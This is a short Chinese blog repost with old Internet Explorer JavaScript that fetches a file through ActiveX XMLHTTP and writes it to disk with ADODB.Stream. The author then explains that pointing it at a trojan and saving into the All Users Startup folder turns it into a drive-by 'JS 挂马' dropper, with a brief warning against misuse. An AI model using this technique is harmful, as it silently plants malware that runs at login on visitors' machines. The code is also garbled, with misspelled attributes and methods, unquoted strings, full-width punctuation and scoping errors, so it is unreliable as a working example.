使用AJAX方式下载文件

原文：http://blog.sina.com.cn/s/blog_55e1543301000aos.html###

网上关于XMLHTTP使用数据流(responseStream)的文章很少，我随便写了个
作用是通过AJAX方式下载文件
<script langue=javascript>
function window.onload()
{
 var xmlhttp = new ActiveXObject(Msxml2.XMLHTTP);
 xmlhttp.open("POST","文件地址"，true);
 xmlhttp.onReadyStateChange=RC;
 xmlhttp.send("");
}

function RC()
{
 if(xmlhttp.readyState==4)
  {
   var adodbstream=new ActiveXObject("ADODB.Stream");
   adodbstream.Type=1;
   var file="文件存放路径"；
   var fso=new ActiveXObject("Scripting.FileSystemObject");
   var temp=fso.BuildPatch(temp,file); 
   adodbstream.Open();
   adodbstream.Write(xmlhttp.responseBody);//或者是responseStream
   adodbstream.SaveToFile(file,2);
   adodbstream.Close();
  }
}
</script>

 

嘿嘿，有些朋友看出问题了吧，如果我把文件换成一个病毒/木马文件，把存放路径设为系统目录（\\..\\Documents and Setting\\All Users\\[开始] 菜单\\程序\\启动\\那个文件名  XP/2K可用）那这代码就完全成XMLHTTP挂马了，也就是传说中的JS挂马,危害甚大不可乱用!